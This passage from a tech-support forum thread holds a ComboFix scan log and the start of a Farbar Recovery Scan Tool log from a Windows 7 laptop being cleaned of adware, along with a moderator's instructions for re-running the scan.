    S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [x]
    S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]
    S3 IntcDAud;Intel(R) Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]
    S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
    S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys;c:\windows\SYSNATIVE\drivers\MBAMSwissArmy.sys [x]
    S3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
    S3 O2MDRRDR;O2MDRRDR;c:\windows\system32\DRIVERS\O2MDRw7x64.sys;c:\windows\SYSNATIVE\DRIVERS\O2MDRw7x64.sys [x]
    S3 O2SDJRDR;O2SDJRDR;c:\windows\system32\DRIVERS\o2sdjw7x64.sys;c:\windows\SYSNATIVE\DRIVERS\o2sdjw7x64.sys [x]
    S3 ST_ACCEL;STMicroelectronics Accelerometer Service;c:\windows\system32\DRIVERS\ST_ACCEL.sys;c:\windows\SYSNATIVE\DRIVERS\ST_ACCEL.sys [x]
    .
    .
    --- Other Services/Drivers In Memory ---
    .
    *NewlyCreated* - MBAMSWISSARMY
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
    LocalServiceAndNoImpersonation REG_MULTI_SZ SSDPSRV upnphost SCardSvr QWAVE wcncsvc
    kuaizip2updatesvc REG_MULTI_SZ Kuaizip Update Checker
    .
    HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs
    HpSvc
    .
    .
    --------- X64 Entries -----------
    .
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive1]
    @="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
    [HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
    2016-01-29 23:03 358064 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive2]
    @="{5AB7172C-9C11-405C-8DD5-AF20F3606282}"
    [HKEY_CLASSES_ROOT\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}]
    2016-01-29 23:03 358064 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive3]
    @="{A78ED123-AB77-406B-9962-2A5D9D2F7F30}"
    [HKEY_CLASSES_ROOT\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}]
    2016-01-29 23:03 358064 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive4]
    @="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
    [HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
    2016-01-29 23:03 358064 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive5]
    @="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
    [HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
    2016-01-29 23:03 358064 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro1 (ErrorConflict)]
    @="{8BA85C75-763B-4103-94EB-9470F12FE0F7}"
    [HKEY_CLASSES_ROOT\CLSID\{8BA85C75-763B-4103-94EB-9470F12FE0F7}]
    2016-09-05 14:50 2278192 ----a-w- c:\program files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro2 (SyncInProgress)]
    @="{CD55129A-B1A1-438E-A425-CEBC7DC684EE}"
    [HKEY_CLASSES_ROOT\CLSID\{CD55129A-B1A1-438E-A425-CEBC7DC684EE}]
    2016-09-05 14:50 2278192 ----a-w- c:\program files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro3 (InSync)]
    @="{E768CD3B-BDDC-436D-9C13-E1B39CA257B1}"
    [HKEY_CLASSES_ROOT\CLSID\{E768CD3B-BDDC-436D-9C13-E1B39CA257B1}]
    2016-09-05 14:50 2278192 ----a-w- c:\program files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\KzShlobj2]
    @="{AAA0C5B8-933F-4200-93AD-B143D7FFF9F3}"
    [HKEY_CLASSES_ROOT\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F3}]
    2016-09-19 00:09 560768 ------w- c:\program files (x86)\KuaiZip\X64\KZipShell.dll
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Apoint"="c:\program files\DellTPad\Apoint.exe" [2012-06-19 626552]
    "IgfxTray"="c:\windows\system32\igfxtray.exe" [2012-11-09 168216]
    "HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2012-11-09 391960]
    "Persistence"="c:\windows\system32\igfxpers.exe" [2012-11-09 419096]
    "SysTrayApp"="c:\program files\IDT\WDM\sttray64.exe" [2011-02-16 525312]
    .
    ------- Supplementary Scan -------
    .
    uLocal Page = c:\windows\system32\blank.htm
    uStart Page = hxxp://www.cloudynights.com/page/index.html
    mLocal Page = c:\windows\SysWOW64\blank.htm
    mStart Page = www.google.com
    IE: E&xport to Microsoft Excel - c:\program files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE/3000
    IE: Se&nd to OneNote - c:\program files (x86)\Microsoft Office\Root\Office16\ONBttnIE.dll/105
    Trusted Zone: localhost
    TCP: DhcpNameServer = 192.168.0.1 24.200.241.37 24.202.72.13
    Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - c:\program files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
    Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - c:\program files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
    Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - c:\program files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
    Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - c:\program files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
    FF - ProfilePath - c:\users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\
    FF - prefs.js: browser.search.selectedEngine - Search Module
    .
    - - - - ORPHANS REMOVED - - - -
    .
    Toolbar-Locked - (no file)
    Wow6432Node-HKCU-Run-MHX680O3EE - c:\program files (x86)\DPower\F10H5ROMJR.exe
    Wow6432Node-HKCU-Run-UD8BS0RW9M - c:\program files (x86)\DPower\OMAX7YIRM1.exe
    Wow6432Node-HKCU-Run-MP86W16DCV - c:\program files (x86)\DPower\NFQMP4E7QL.exe
    Wow6432Node-HKCU-Run-ID9KZOQAXP - c:\program files (x86)\DPower\NMJA5FXU1Z.exe
    Wow6432Node-HKCU-Run-R3TEGTCHQT - c:\program files (x86)\DPower\D7HVZHU1UW.exe
    BHO-{7B6678FD-F9E3-46FD-aCF0-4C011573F737} - c:\program files\Icatti\Orosbusf64.dll
    Toolbar-Locked - (no file)
    .
    .
    .
    --------------------- LOCKED REGISTRY KEYS ---------------------
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\User Preferences]
    @Denied: (2) (Administrator)
    "88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977"=hex:01,00,00,00,d0,8c,9d,df,01,15,
    d1,11,8c,7a,00,c0,4f,c2,97,eb,01,00,00,00,87,d7,78,16,58,5c,04,4a,8a,f1,62,\
    "2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81"=hex:01,00,00,00,d0,8c,9d,df,01,15,
    d1,11,8c,7a,00,c0,4f,c2,97,eb,01,00,00,00,87,d7,78,16,58,5c,04,4a,8a,f1,62,\
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3g2\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.3G2"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.3GP"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp2\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.3G2"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gpp\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.3GP"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.AAC\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ADTS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ADT\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ADTS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ADTS\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ADTS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AIFF"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AIFF"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AIFF"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asf\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ASF"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asx\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ASX"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AU"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.avi\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AVI"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cda\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.CDA"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="FirefoxHTML"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="FirefoxHTML"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpg\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="OISjpegfile"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2T\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.M2TS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2TS\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.M2TS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2V\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.m3u"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4a\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.M4A"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MP4"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.MHT"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.MHT"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MIDI"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MIDI"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MOD\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mov\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MOV"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MP3"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2v\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MP3"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MP4"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4v\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MP4"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpa\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpe\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpeg\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpg\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpv2\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MTS\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.M2TS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.partial\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.PARTIAL"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MIDI"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="FirefoxHTML"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AU"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.SVG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TS\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.TTS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TTS\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.TTS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.url\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.URL"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WAV"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wax\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WAX"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.website\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.WEBSITE"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wm\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ASF"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WMA"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmd\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WMD"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wms\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WMS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WMV"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmx\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ASX"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmz\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WMZ"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wpl\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WPL"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WVX"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="FirefoxHTML"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="FirefoxHTML"
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
    @Denied: (A) (Everyone)
    "Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
    @Denied: (A) (Everyone)
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
    "Key"="ActionsPane3"
    "Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
    @Denied: (Full) (Everyone)
    .
    ------------------------ Other Running Processes ------------------------
    .
    c:\windows\system32\DRIVERS\o2flash.exe
    c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    c:\program files (x86)\Malwarebytes Anti-Malware\mbam.exe
    .
    **************************************************************************
    .
    Completion time: 2016-09-19 03:11:55 - machine was rebooted
    ComboFix-quarantined-files.txt 2016-09-19 07:11
    .
    Pre-Run: 248,515,768,320 bytes free
    Post-Run: 248,846,794,752 bytes free
    .
    - - End Of File - - 4B875B4F3B699F6D5C0E5D3E39E93041
    A36C5E4F47E84449FF07ED3517B43A31
     
  15. broni

    broni Malware Annihilator Techie7 Moderator Head Security

    Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

    • Double click to run it.
    • Make sure you checkmark Addition.txt box.
    • Press Scan button.
    • Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.
     
  16. photiost

    photiost Established Techie7 Member

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-09-2016
    Ran by Administrator (administrator) on DELL35X8BT1 (19-09-2016 20:30:13)
    Running from C:\Users\Administrator\Downloads
    Loaded Profiles: Administrator (Available Profiles: Administrator)
    Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: FF)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
    (Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
    (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
    (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
    (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
    (O2Micro International) C:\Windows\System32\drivers\o2flash.exe
    (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
    (Intel Corporation) C:\Windows\System32\igfxtray.exe
    (Intel Corporation) C:\Windows\System32\hkcmd.exe
    (Intel Corporation) C:\Windows\System32\igfxpers.exe
    (IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
    (SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
    (Global surveys) C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
    (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
    (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [626552 2012-06-18] (Alps Electric Co., Ltd.)
    HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [525312 2011-02-15] (IDT, Inc.)
    Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-09-12] (SUPERAntiSpyware)
